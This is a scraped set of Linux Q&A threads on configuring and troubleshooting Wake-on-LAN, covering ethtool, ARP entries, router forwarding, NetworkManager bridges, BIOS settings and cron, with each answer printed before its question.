<7>[721197.226861] PM: Finishing wakeup.
<4>[721197.226862] Restarting tasks ... done.
<6>[721197.228541] video LNXVIDEO:00: Restoring backlight stateThe idea would be that maybe there are some messages here related to how the system came up (WOL or power switch). You could add a script that runs as part of a udev event that could grep through the hwinfo output to see if messages are present for WOL vs. powerswitch. Just a idea at this point.
References
HowTo: Wake Up Computers Using Linux Command [ Wake-on-LAN ( WOL ) ]
ether-wake man page
|
Is there any (reliable) way to find out if the PC booted because of a Wake-on-LAN packet instead of pressing the power button? I want to automatically check whether WOL is correctly configured.
I know about ethtool's WOL output, but this just tells me if WOL is turned on, not how the PC booted, right?
|
Find out if computer started via Wake-on-LAN or power button?
|
No, ssh has nothing to do with MAC addresses. If you are using DHCP, you could perhaps look into the DHCP server's logs or lease files to determine the MAC address.
|
I have a machine at the office which is shut off; I was hoping to turn it on from home using Wake-on-LAN. Reading about this, I have realized that I need the MAC address of the machine. Is there a way to find the MAC address of the machine from my ssh connection history?
I use an RSA key to connect to the machine.
|
Is there a way to find the mac address of a remote machine I have connected to with ssh?
|
Wake on LAN is a BIOS and NIC feature, not an OS feature, that is, you need a supporting BIOS and NIC to do it.
Once you've enabled it in your BIOS (if you can), you can check if your NIC has WOL support enabled by checking the output of ethtool [interface].
If the value of Supports Wake-on contains g, your NIC supports WOL magic packets.
To check if it is actually enabled, take a look at the value of Wake-on. If it contains g, your NIC has magic packet support enabled.
If it isn't enabled, run the following:
ethtool -s [interface] wol g
You'll have to issue this command every time your system starts, so add it to the appropriate place. In Ubuntu, perhaps the best place would be an up rule in /etc/network/interfaces, or the equivalent for your network manager.
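For example, with ifupdown on Ubuntu/Debian the stanza might look like this (the interface name and addressing method are assumptions; adjust to your setup):

```
auto eth0
iface eth0 inet dhcp
    post-up ethtool -s eth0 wol g
```

The post-up command re-applies the WOL flag every time the interface is brought up, so it survives reboots.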
|
I was wondering if it were possible to make my server go to sleep after a set period of time, but still be listening for LAN requests. I use my server as a media server that might get used 3 or 4 hours a day, and it is really a waste of power to have it running all the time. However, I don't want to run up to the second floor to switch it on when we want to watch a movie. I saw a few posts about stopping this from happening, but how do you enable it?
|
Is there a way to enable sleep mode and wake on lan?
|
With ngrep, you can do this:
ngrep '\xff{6}(.{6})\1{15}'
That matches 0xff 6 times, followed by any 6 bytes, followed by those same 6 bytes repeated 15 more times. I confirmed that it matches a packet generated by wakeonlan.
ngrep has options that are useful for scripting (e.g., -W single to have a single line per matched packet, -l to defeat buffering, -t for timestamps, -q to silence other output).
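The same pattern can be sanity-checked offline with GNU grep's PCRE mode against a file containing a magic packet. This is only a sketch to illustrate the regex (it assumes GNU grep built with PCRE support, and a made-up example MAC):

```shell
# Build a sample magic packet for the example MAC 12:34:56:78:9a:bc,
# then verify the ngrep pattern matches it: 6 x 0xFF followed by the
# same 6 bytes repeated 16 times.
mac='\x12\x34\x56\x78\x9a\xbc'
{
  printf '\xff\xff\xff\xff\xff\xff'
  for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16; do printf "$mac"; done
} > /tmp/wol-sample.bin
LC_ALL=C grep -qaP '\xff{6}(.{6})\1{15}' /tmp/wol-sample.bin && echo match
```

The -a flag forces grep to treat the binary file as text, and LC_ALL=C keeps the . wildcard matching arbitrary bytes rather than multibyte characters.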
|
I want to listen for WOL (Wake-On-LAN) packets.
As WOL packets can be UDP/TCP/whatever (yes, even TCP, but probably useless), I have to check every incoming packet for the WOL-specific pattern.
This can't be done directly with netfilter because the pattern is 6xFF + 16xtarget-MAC-address (so we have 96 variable bytes).
The tools I found can detect lots of protocols, but none are able to detect WOL.
Do you know a simple way to inspect every packet and run a script when a specific pattern is detected?
|
Deep packets inspection to detect WOL
|
A tool that will handle the majority of this is arpwatch. By default (on Debian, at least) it writes to /var/lib/arpwatch/arp.dat. This file is flushed and updated each time arpwatch is stopped.
The file contains entries of this form:
52:54:00:aa:bb:cc 192.168.1.2 1452252063 somehostname eth0
The /etc/ethers file requires only the MAC address and either the IP address or a resolvable hostname:
52:54:00:aa:bb:cc 192.168.1.2
It is then quite straightforward to keep /etc/ethers updated and in sync with a small script, run daily from crontab:
#!/bin/bash

# Flush arp.dat
service arpwatch restart

# Save a copy
test -f /etc/ethers || touch /etc/ethers
cp -fp /etc/ethers /etc/ethers.old

# Check to see if anything new has arrived. If so rebuild the file
(
    echo '# This file is updated automatically from /var/lib/arpwatch/arp.dat'
    echo '# Take care when editing'
    echo '#'
    (
        awk '{print $1,$2}' /var/lib/arpwatch/arp.dat
        grep -v '^#' /etc/ethers.old
    ) |
        sort -u
) >/etc/ethers.tmp

# Update ethers with the new file
cmp -s /etc/ethers.tmp /etc/ethers || cat /etc/ethers.tmp >/etc/ethers
rm -f /etc/ethers.tmp

# All done
exit 0
|
Is there a tool/daemon available that automatically fills /etc/ethers in the background with the proper hostname:MAC pairs, to have an up-to-date database when needed, for example for wake on lan (WOL)? Maybe something that does not "scan" the network, but casually dumps the ARP cache or something?
Thanks
|
is there a tool/daemon that automatically fills /etc/ethers in the background to have a proper wake on lan hostname:mac database when needed?
|
The issue with waking a host is that to send it a packet, the network stack must know the MAC address of the NIC. Normally this is handled dynamically by ARP. If the MAC entry has been evicted from the router's ARP table while the host is asleep, the host can't answer the ARP query, so the router can't get the MAC address needed to reach the sleeping host and send it the WOL Magic Packet™, even though such a packet includes this MAC address 16 times in its payload.
Here are two methods to overcome this relying only on the network stack (and companions like iptables or tc).
Permanent ARP
Since there is control over the router, one can set a permanent ARP entry on the router for the sleeping host. That way the previous problem can never happen. The router can now easily send or forward a WOL Magic Packet™ without having to use any broadcast anywhere. With NAT to "port forward", a remote host can then use the wakeonlan command (rather than the etherwake command, because the former can change the UDP port).
The sleeping host thus needs a static address (or one with a permanent DHCP lease). Let's say the WAN address on the router is 192.0.2.2 on wan0, the LAN side on the router is 192.168.1.1/24 on interface lan0 and the sleeping host 192.168.1.101/24 on an interface with MAC address 12:34:56:78:9a:bc.
On the router:
ip neighbour replace 192.168.1.101 lladdr 12:34:56:78:9a:bc dev lan0 nud permanent
As it's unclear whether the packet received by the NIC will be consumed or still correctly made available to the waking host, it's traditionally port 9 that has been chosen, because that's the discard service: in case it's running, either outcome is the same. Pick another port than 9 if needed. This port on the sleeping host should preferably be unused and firewalled (packets dropped), or actually running the discard service. As one port maps to one target, if there are multiple WOL hosts, each should have a different port.
The issue of a first packet arriving elsewhere in OP's description is worked around by selecting all interfaces that aren't the lan0 interface.
So still on the router, using iptables, do the DNAT and allow the redirected packet:
iptables -t nat -I PREROUTING ! -i lan0 -p udp --dport 9 -j DNAT --to-destination 192.168.1.101
iptables -I FORWARD -m conntrack --ctstate DNAT -d 192.168.1.101 -j ACCEPT
A remote host on the Internet can now do this to wake the sleeping host:
wakeonlan -i 192.0.2.2 -p 9 12:34:56:78:9a:bc
System integration depends on the method used for network configuration. For example, if it's configured with interfaces and ifupdown, the two iptables commands could be added as pre-up commands in the iface lan0 ... stanza (and deleted in a down command), and the ip neighbour command as an up command.
Directed subnet broadcast (since kernel 4.19)
Tools always have options to use broadcast packets which end up as broadcast Ethernet frames that will reach all hosts, including the target host.
This can be done when routing but there are more risks involved (including participating in reflected attacks). Ponder security before using.
The directed subnet broadcast must be enabled globally and on the receiving WAN interface (not the target LAN interface). If there are possibly multiple WAN interfaces (the OP describes packets arriving first on one interface, then on another), enable it on all involved.
sysctl -w net.ipv4.conf.all.bc_forwarding=1
sysctl -w net.ipv4.conf.wan0.bc_forwarding=1
Add NAT and FORWARD rules:
iptables -t nat -I PREROUTING ! -i lan0 -p udp --dport 9 -j DNAT --to-destination 192.168.1.255
iptables -I FORWARD -m conntrack --ctstate DNAT -d 192.168.1.255 -j ACCEPT
And as an option to limit risks, finally convert the IPv4 Ethernet frame (ethertype 0x0800) into the de facto ethertype 0x0842 used for WOL using tc, so the result will be ignored by network stacks (but not by WOL NICs). One could have used a mark set by iptables, or, as here, just match the IP destination and UDP destination port 9. The former method would have clashed with marks if Untangle uses them; either method will clash anyway if Untangle uses tc for QoS.
tc qdisc add dev lan0 root handle 1: prio # simple classful qdisc used only to enable filters
tc filter add dev lan0 parent 1: protocol ip basic match '
cmp (u32 at 16 layer network eq 0xc0a801ff) and
cmp (u8 at 9 layer network eq 17) and
cmp (u16 at 2 layer transport eq 9)
' action skbmod set etype 0x842
Above:
u32 at 16 layer network eq 0xc0a801ff means IP destination address 192.168.1.255,
u8 at 9 layer network eq 17 means UDP,
u16 at 2 layer transport eq 9 means destination port 9.
and the resulting action is to change the ethertype to 0x842.
Likewise, a remote host on the Internet can now do this to wake the sleeping host:
wakeonlan -i 192.0.2.2 -p 9 12:34:56:78:9a:bc
but it will target the whole LAN each time, so keeping the same port and just changing the MAC address is good enough when there are multiple sleeping WOL hosts.
Other method to consider:
fwknopd installed on the server and fwknop installed on the client implement an encrypted single packet authorization mechanism to trigger commands. It could be used to trigger running wakeonlan/etherwake on the router.
|
I have an untangle box (debian 10 underneath) that I am attempting to forward a WOL packet from a host in one subnet to a host in another subnet.
My initial solution to this was to use knockd: listen for a SYN packet on one of its interfaces on one subnet, then execute an etherwake command on the other subnet to wake up the host. I would send the SYN packet using netcat from a Linux server in the first subnet, sending the packet to the gateway IP (the untangle box).
Problem is, the traffic destined for the FW itself is processed initially on an unaddressed VLAN interface. It's a bit weird: the SYN packet is only seen on the unaddressed interface, while all other packets are seen on the actual addressed VLAN interface. I have confirmed this with tcpdump.
It breaks my plan on using knockd, because knockd refuses to listen on interfaces without an IP address.
I can see the syn packet coming into the unaddressed interface with tcpdump, and knockd uses tcpdump under the hood. So is there a way to force knockd to listen on an unaddressed interface anyways?
If knockd is just completely out of the question, how would you implement a WOL packet forwarder on Debian 10?
|
Debian Wake on LAN Packet Forwarding?
|
I am replying to this message because I was struggling with the same issue.
The problem seems to lie in the etherwake path. Cron runs commands with a minimal PATH (typically /usr/bin:/bin), but etherwake is located in /usr/sbin:
/usr/sbin/etherwake
So instead of doing:
00 06 * * * etherwake -i wlan0 00:11:22:33:44:55The proper way is:
00 06 * * * /usr/sbin/etherwake -i wlan0 00:11:22:33:44:55
This seemed to do the trick for me. Some other people struggling with the same issue have reported that installing wakeonlan:
sudo apt-get install wakeonlan
solves the problem as well.
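An alternative to spelling out the full path in each entry is to set PATH at the top of the crontab, so every job inherits it (a sketch; trim the directories to taste):

```
PATH=/usr/sbin:/usr/bin:/sbin:/bin
00 06 * * * etherwake -i wlan0 00:11:22:33:44:55
```

This also fixes any other cron jobs that rely on commands living in the sbin directories.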
|
I wrote a small application, which runs etherwake. From bash it works fine and wakes up another PC. But if it is launched from crontab, then nothing happens.
Has anyone encountered a similar problem and how to solve it?
Note: Maybe it matters, that the app is written with Qt/C++, etherwake runs via QProcess and OS is Raspbian on Raspberry Pi Zero.
|
Cron and etherwake on Raspbian
|
After experimenting with the BIOS settings I was finally able to get Linux to boot using WoL! Apparently I had to enable both Power On By PCI Devices and Power On By PCIE Devices for it to boot under Linux using WoL. To be sure that was the cause, I tried all combinations:
Just to be thorough, I tried disabling them both to see whether that would make it impossible to resume using WoL, which it did, because it made it impossible to set the Wake-on flag to g, as was to be expected.
When enabling either of them I was able to resume using WoL, but unable to boot using WoL.
When enabling them both I was able to both resume and boot using WoL.
Under Windows, after enabling the driver setting Wake From Shutdown, it was only able to boot using WoL when Power On By PCIE Devices was enabled. Enabling Power On By PCI Devices made no impact. After changing these driver settings, Windows was no longer able to go into sleep mode. The reason was that the Ethernet device had been added to the list of devices that are allowed to wake Windows. After disabling the Ethernet device from waking Windows through the power configuration, Windows was again able to go into sleep mode.
|
I am trying to get Wake-on-LAN (WoL) to work on my desktop. It has an Asus P6T Deluxe v2 motherboard and I have successfully enabled the WoL option within the BIOS power management [1]. The desktop is currently configured as a dual boot of Windows 7 and Arch Linux. On Windows 7 I am able to boot using WoL, but on my Arch Linux I only got resume to work using WoL. I followed the instructions on the Arch Linux wiki page about WoL [2]. What do I have to configure on Linux to make it possible to boot using WoL as well?
All the tutorials about WoL on Linux I have been able to find, only describe how to enable it using ethtool and how to generate a magic package from another device, but none that I could find that would explain how to make sure you can boot using WoL.
From a post on Ask Ubuntu [3] I deduced that it probably has something to do with enabling /proc/acpi/wakeup for my Ethernet card. I tried enabling it using echo POP6 > /proc/acpi/wakeup which unfortunately did not enable it. When I tried it for a USB device, e.g. USB3, it did toggle correctly between being enabled and disabled.
Am I on the right track with enabling my Ethernet card using /proc/acpi/wakeup, or is it irrelevant to enabling Linux to boot using WoL? And if I should enable it, what is the correct way to enable it for my Ethernet card?
http://blog.controlspace.org/2009/09/wake-on-lan-with-windows-7-and-asus-p6t.html
https://wiki.archlinux.org/index.php/Wake-on-LAN
https://askubuntu.com/questions/352888/wake-on-lan-13-04-problems
In case I made a bad assumption, this is how I assumed POP6 is my Ethernet device.
Executing lspci -tv gave me:
-+-[0000:ff]-+-00.0 Intel Corporation Xeon 5500/Core i7 QuickPath Architecture Generic Non-Core Registers
| +-00.1 Intel Corporation Xeon 5500/Core i7 QuickPath Architecture System Address Decoder
| +-02.0 Intel Corporation Xeon 5500/Core i7 QPI Link 0
| +-02.1 Intel Corporation Xeon 5500/Core i7 QPI Physical 0
| +-03.0 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller
| +-03.1 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Target Address Decoder
| +-03.4 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Test Registers
| +-04.0 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 0 Control Registers
| +-04.1 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 0 Address Registers
| +-04.2 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 0 Rank Registers
| +-04.3 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 0 Thermal Control Registers
| +-05.0 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 1 Control Registers
| +-05.1 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 1 Address Registers
| +-05.2 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 1 Rank Registers
| +-05.3 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 1 Thermal Control Registers
| +-06.0 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 2 Control Registers
| +-06.1 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 2 Address Registers
| +-06.2 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 2 Rank Registers
| \-06.3 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 2 Thermal Control Registers
\-[0000:00]-+-00.0 Intel Corporation 5520/5500/X58 I/O Hub to ESI Port
+-01.0-[01]--
+-03.0-[02]--+-00.0 Advanced Micro Devices, Inc. [AMD/ATI] Cypress PRO [Radeon HD 5850]
| \-00.1 Advanced Micro Devices, Inc. [AMD/ATI] Cypress HDMI Audio [Radeon HD 5800 Series]
+-07.0-[03]--
+-14.0 Intel Corporation 7500/5520/5500/X58 I/O Hub System Management Registers
+-14.1 Intel Corporation 7500/5520/5500/X58 I/O Hub GPIO and Scratch Pad Registers
+-14.2 Intel Corporation 7500/5520/5500/X58 I/O Hub Control Status and RAS Registers
+-14.3 Intel Corporation 7500/5520/5500/X58 I/O Hub Throttle Registers
+-1a.0 Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #4
+-1a.1 Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #5
+-1a.2 Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #6
+-1a.7 Intel Corporation 82801JI (ICH10 Family) USB2 EHCI Controller #2
+-1b.0 Intel Corporation 82801JI (ICH10 Family) HD Audio Controller
+-1c.0-[06]--
+-1c.2-[05]----00.0 Marvell Technology Group Ltd. 88E8056 PCI-E Gigabit Ethernet Controller
+-1c.5-[04]----00.0 Marvell Technology Group Ltd. 88E8056 PCI-E Gigabit Ethernet Controller
+-1d.0 Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #1
+-1d.1 Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #2
+-1d.2 Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #3
+-1d.7 Intel Corporation 82801JI (ICH10 Family) USB2 EHCI Controller #1
+-1e.0-[07]----02.0 VIA Technologies, Inc. VT6306/7/8 [Fire II(M)] IEEE 1394 OHCI Controller
+-1f.0 Intel Corporation 82801JIR (ICH10R) LPC Interface Controller
+-1f.2 Intel Corporation 82801JI (ICH10 Family) 4 port SATA IDE Controller #1
+-1f.3 Intel Corporation 82801JI (ICH10 Family) SMBus Controller
\-1f.5 Intel Corporation 82801JI (ICH10 Family) 2 port SATA IDE Controller #2
The device with a LAN connection is enp5s0 according to the response of calling ip addr, which I assumed is this one from lspci -tv: +-1c.2-[05]----00.0 Marvell Technology Group Ltd. 88E8056 PCI-E Gigabit Ethernet Controller.
Executing cat /proc/acpi/wakeup gave me:
Device S-state Status Sysfs node
NPE2 S4 *disabled
NPE4 S4 *disabled
NPE5 S4 *disabled
NPE6 S4 *disabled
NPE8 S4 *disabled
NPE9 S4 *disabled
NPEA S4 *disabled
P0P1 S4 *disabled pci:0000:00:1e.0
PS2K S4 *disabled
PS2M S4 *disabled
USB0 S4 *enabled pci:0000:00:1d.0
USB1 S4 *enabled pci:0000:00:1d.1
USB2 S4 *enabled pci:0000:00:1d.2
USB5 S4 *disabled
EUSB S4 *enabled pci:0000:00:1d.7
USB3 S4 *enabled pci:0000:00:1a.0
USB4 S4 *enabled pci:0000:00:1a.1
USB6 S4 *enabled pci:0000:00:1a.2
USBE S4 *enabled pci:0000:00:1a.7
P0P4 S4 *disabled pci:0000:00:1c.0
P0P5 S4 *disabled
P0P6 S4 *disabled pci:0000:00:1c.2
P0P7 S4 *disabled
P0P8 S4 *disabled
P0P9 S4 *disabled pci:0000:00:1c.5
NPE1 S4 *disabled pci:0000:00:01.0
NPE3 S4 *disabled pci:0000:00:03.0
NPE7 S4 *disabled pci:0000:00:07.0
GBE S4 *disabled
Since the Sysfs node matches what I got from lspci -tv for device POP6, I assumed I had to enable POP6 to enable my Ethernet card.
|
How can I boot my desktop using Wake-on-LAN?
|
I found the problem: I had to use wakeonlan with the -i <ip> option (with <ip> of course replaced by the IP of the system).
|
Following these instructions, I found that phy0 on my desktop should support wake on wlan and turned it on.
[root@Arch alex]# iw phy0 wowlan show
WoWLAN is enabled:
* wake up on magic packet
However, when I suspend the system and try to wake it up from a distance, it doesn't work:
[alex@Archlaptop tmp]$ wol 44:E5:17:ED:9E:D2
Waking up 44:E5:17:ED:9E:D2...
And nothing happens. Furthermore, if I follow the Arch wiki, I don't get wake-on-wlan:
[root@Arch alex]# ethtool wlo1
Settings for wlo1:
Link detected: yes
What is going on?
|
Wake on wlan should work but doesn't
|
Ok, silly me did not think about the fact that Windows and Linux by default have an ARP timeout of about 30 seconds, as one can see by running
netsh interface ipv4 show interface 2
in cmd.exe, where the 2 has to be replaced with the Idx of your NIC, which you get by issuing
netsh interface ipv4 show interfaces
On Linux, type
cat /proc/sys/net/ipv4/neigh/default/base_reachable_time_ms
in your shell to see the default ARP timeout in milliseconds.
So the solution is to set a static ARP entry in order to be able to wake the system through SSH or SMB or whatever. To do this, run
arp -s 10.0.0.200 00-10-54-CA-E1-40
on Windows and
arp -s 10.0.0.200 00:10:54:CA:E1:40
on your Linux system.
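The two commands differ only in the MAC notation (dashes and uppercase on Windows, colons and lowercase on Linux); a small shell sketch can convert one to the other:

```shell
# Convert a Windows-style MAC (dashes, uppercase) to Linux style
# (colons, lowercase) using tr's character mapping.
win2lin() { printf '%s\n' "$1" | tr 'A-Z-' 'a-z:'; }
win2lin 00-10-54-CA-E1-40   # prints 00:10:54:ca:e1:40
```

Handy when copy-pasting the address between the two arp invocations above.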
|
I'm having some trouble with Wake on LAN through PHY and unicast. I'm able to wake the system by pinging or sshing the shut down machine, but only within the first ~30 seconds. Why's that, what could be the cause?
I put a script 70wol into /usr/lib/pm-utils/sleep.d and made it executable, it obviously is executed since it works:
#!/bin/bash
ethtool -s eth0 wol pug
I'm on Debian Testing, the NIC is an Intel I217-V on an Intel DH87RL, and the driver is Intel's e1000e 2.5.4 (e1000e.ko).
|
Wake on LAN through PHY and unicast only works in the first ~30 seconds after pm-suspend
|
systemctl enable sshd.service
This will set the SSH daemon to start automatically at boot. (On Debian-based systems such as Kali, the unit may be named ssh.service instead.)
|
I'm having an issue with ssh. My idea was to set up Wake on Lan on my pc, which runs Kali Linux Rolling (2008.1), and using ssh to connect to it after it booted.
Everything works fine, except for the fact that after the pc is booted I can't connect to ssh. To do that, I need to log on from my pc, start ssh and then connect remotely.
Obviously the problem is that the ssh service stops itself after powering off the pc and it doesn't start automatically once the pc is booted. Is there a way to solve this problem? I mean, there must be.
|
How to start sshd automatically [closed]
|
Wake-On-LAN is a hardware feature: it's not meant to reach the main interface participating in routing (the bridge), but always the physical interface (the actual NIC set as a bridge port). The usual method used for Wake-On-LAN is the Magic Packet (original 1995 AMD white paper: PDF), rather than other methods (such as unicast, broadcast or ARP), to avoid spurious unwanted wake-ups.
Normally, Wake-On-LAN can be enabled using ethtool (eg: on eth0) with:
ethtool --change eth0 wol g
giving:
# ethtool eth0 | grep -i wake
Supports Wake-on: pumbg
Wake-on: g
But actually NetworkManager, if not told otherwise, will probably disable Wake-On-LAN again on the interface it manages, either before or after a suspend, making it fail either the first time or the second time (and after reboots). So this is not enough: NetworkManager has to be told to use Wake-On-LAN on this interface.
nmcli commands below could be done using the GUI applet instead if a GUI is available.
If for example NetworkManager has these connection names: Bridge connection 1 and as slave interface Ethernet connection 1, the feature has to be activated on Ethernet connection 1.
# nmcli connection show id 'Ethernet connection 1' | grep -i wake
802-3-ethernet.wake-on-lan: default
802-3-ethernet.wake-on-lan-password: --which is documented in nm-settings-nmcli(5):802-3-ethernet.wake-on-lan
The NMSettingWiredWakeOnLan options to enable. Not all devices support
all options. May be any combination of "phy" (0x2), "unicast" (0x4),
"multicast" (0x8), "broadcast" (0x10), "arp" (0x20), "magic" (0x40) or
the special values "default" (0x1) (to use global settings) and
"ignore" (0x8000) (to disable management of Wake-on-LAN in
NetworkManager).While there might be a default somewhere else, setting it explicitly to magic will make sure Wake-On-LAN stays enabled on this interface.
Set it to magic like this:
nmcli connection modify 'Ethernet connection 1' 802-3-ethernet.wake-on-lan magic
Because this setting might not be applied immediately by NetworkManager (even after nmcli connection reload), it should also be set manually once, after configuring the above, as described earlier (change the interface name as needed):
ethtool --change eth0 wol g
Now about usage. There is no reason the bridge's Ethernet MAC address will be the same as the NIC's Ethernet MAC address. This is even explicitly not the default on modern systemd systems (though NetworkManager itself might choose to copy it to the bridge). So ARP, even if it's still in the cache of a system in the same LAN, will never be the correct method to have a Magic Packet reach the physical interface. When suspended, one can't rely on the physical interface being kept in promiscuous mode (because it's a bridge port) anymore. Anyway, such ARP would also fail if the cache entry is evicted from that system's cache.
If using IP as payload mechanism, just always use a destination that will resolve into a MAC Ethernet broadcast destination (FF:FF:FF:FF:FF:FF) and not attempt an ARP resolution: either the LAN broadcast 255.255.255.255 or the directed broadcast (eg in LAN 192.168.1.0/24 that would be 192.168.1.255).
For example, if the NIC's MAC address is 12:34:56:78:9a:bc, using wakeonlan, just do, from the same LAN:
wakeonlan 12:34:56:78:9a:bc
or if the system has access to multiple LANs, e.g. 192.0.2.0/24 and 192.168.1.0/24, and the system to wake is in the latter:
wakeonlan -i 192.168.1.255 12:34:56:78:9a:bc
Other tools may have or lack other features. E.g. etherwake instead requires an interface to be specified and won't use IP but Ethernet type 0x0842, a de facto type reserved for Wake-on-LAN (though it doesn't have to be used), and requires root or adequate capabilities to be used:
etherwake -i eth0 12:34:56:78:9a:bc
This is outside the scope of the question, but to give pointers: waking remotely over the Internet requires help from the Internet gateway. It has to run custom software, or do NAT to a broadcast address and enable routing of directed broadcasts, which is always disabled by default for security reasons. As described above, setting a permanent ARP entry usually doesn't help with a bridge, but it could be a fake permanent ARP entry for the sole purpose of waking the system, by reserving a fictive IP address (not used anywhere, including not present on the bridge interface) in the LAN for that purpose.
|
I have been trying to set up an environment for my hypervisor, which is just a Debian Bookworm running qemu.
I have been using the web interface Cockpit to help me see things when the terminal is too arid. But in doing so, I had to switch from using systemd-networkd to NetworkManager.
Recently, I learned how to create a bridge network so my VMs and the host can communicate with each other. But after doing that, my wakeonlan stopped working. I understand that this is expected because the router now 'sees' the MAC address of the bridge instead of the NIC's.
From what I understand, wakeonlan works at the MAC level of the networking model. I tried using arping from other clients on the network and they cannot "see" the MAC address of my hypervisor (bridge).
Now I'm starting to think it might not even be possible to have a bridge and wakeonlan at the same time. Is this possible? If so, how can I do it? Preferably using NetworkManager.
|
Wake On Lan using a nic attached to a NetworkManager bridge interface
|
Solved it by moving the server in question to a dedicated VLAN and then logging the traffic between it and the rest of the network using specific iptables rules triggered on certain ports.
I will have a full writeup on my site when I finish the project and will update this answer then.
|
So I've seen the WOL scripts and they seem like they could work well when I'm trying to connect from a computer that is outside my router.
Script I'm using:
http://www.dd-wrt.com/wiki/index.php/Useful_Scripts#Web_Server_Wake-up
Now the problem I see is that whenever I'm home, the WOL script will be useless because the initiating computer and the server are on the same subnet, so the router will not log the request.
Is there a way to have the router log the requests that are sent between two computers inside its network? I'm not very knowledgeable when it comes to network structure, so I don't know if this is possible. Do I need to somehow proxy all my traffic through my router?
For explanation, here is what I'm trying to do:
I have my home server that serves up SMB, AFP, HTTP(s), and a few other web applications. I would like the server to be sleeping when it's not being accessed, period. So if something outside the network requests HTTP access, I want the server to wake up. If a computer on the local subnet requests an SMB share, I want the server to wake up.
Things to note:
I have an Ubuntu server.
All machines that are on the local network are directly connected to the router. I have one hub that some machines are connected to, but all traffic should be going through the router.
EDIT: Just had a thought. What if I put the server in question on a separate VLAN and allowed communication between the VLANs through the router? Then the traffic would have to go through the firewall and I could log it there. Would anyone know how to set up such a system?
|
Use DD-WRT to auto WOL when traffic is on same subnet
|
Simple Answer
I think you're going about this the wrong way. The simple approach is that you don't need to assign it an IP address at all. Send the WOL packet to your LAN's broadcast address. This is almost always the last address in the subnet. So if your LAN is on 192.168.1.x with subnet mask 255.255.255.0, the broadcast address will be 192.168.1.255.
This will be sent to ALL machines on the LAN (all machines on the same subnet at least). This won't matter! The WOL "magic packet" must contain the MAC address of the machine you want to wake up, so every other machine on your network will receive the packet and ignore it.
Complex Answer
On an Ethernet LAN packets are always sent to hardware (MAC) addresses not IP addresses. When machine A 192.168.1.2 tries to send a message to machine B 192.168.1.3 it uses ARP to find the mac address associated with 192.168.1.3 and then send the message to that mac address.
Normally ARP works by A broadcasting "who is 192.168.1.3" and machine B responding "it's me". But with machine B switched off, machine B cannot respond and doesn't even know its own IP address. So ARP cannot work with machine B switched off.
Fortunately, Linux will let you statically set the MAC address associated with an IP address and bypass ARP altogether. In your case you would do that on your r-pi custom router:
sudo arp -s <ip address> <PC's mac address>
Eg:
sudo arp -s 192.168.1.3 00:0a:29:10:24:af
Now your router (and only your router) knows how to talk to 192.168.1.3 without it being switched on. As long as WOL has been set up on that machine and it is plugged in correctly, you can address the WOL packet to the PC's IP address.
For this to work you do need to be sure that 192.168.1.3 will never be used by another machine. It's helpful to make sure that your PC always has this IP address, or things will get very confusing.
Question1: How can I assign IP address to eth1 when the device connecting eth1 turns off?
Use sudo arp -s <ip address> <mac address> on the machine that wants to talk to it.
Question2: Should I create virtual bridge to achieve this?
No
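To make the "magic packet" format concrete, here is a minimal Python sketch (not part of the original answer): the packet is 6 bytes of 0xFF followed by the target's MAC address repeated 16 times, sent as a UDP broadcast (port 9 is customary) so no ARP resolution of the sleeping host is needed.

```python
import socket

def magic_packet(mac):
    """Build a WOL magic packet: 6 x 0xFF, then the MAC repeated 16 times."""
    mac_bytes = bytes.fromhex(mac.replace(":", ""))
    return b"\xff" * 6 + mac_bytes * 16

def send_wol(mac, broadcast="255.255.255.255", port=9):
    """Send the magic packet to the LAN broadcast address over UDP."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.sendto(magic_packet(mac), (broadcast, port))
    sock.close()

# send_wol("12:34:56:78:9a:bc")  # MAC from the example above
```

Since every host on the subnet receives the broadcast, only the NIC whose MAC matches the 16 repetitions will wake up; the rest silently drop it.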
|
I want to use wake on lan via my custom router. The image below shows my network layout. I could make a connection from my smartphone to the raspi3 using Google Cloud Platform and a VPN (SoftEther), and from the raspi3 to the Desktop PC when the Desktop PC is turned on.
However, when the Desktop PC is turned off, eth1 is not assigned an IP address. So I couldn't use wake on lan (couldn't send the magic packet to the Desktop PC with Python). Here is the ifconfig output;
sudo ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.16.0.20 netmask 255.255.254.0 broadcast 172.16.1.255
inet6 fe80::51dd:e5ef:c061:adb9 prefixlen 64 scopeid 0x20<link>
ether b8:27:eb:df:31:9c txqueuelen 1000 (Ethernet)
RX packets 158 bytes 26655 (26.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 168 bytes 42199 (41.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

eth1: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 04:ab:18:3b:af:e2 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
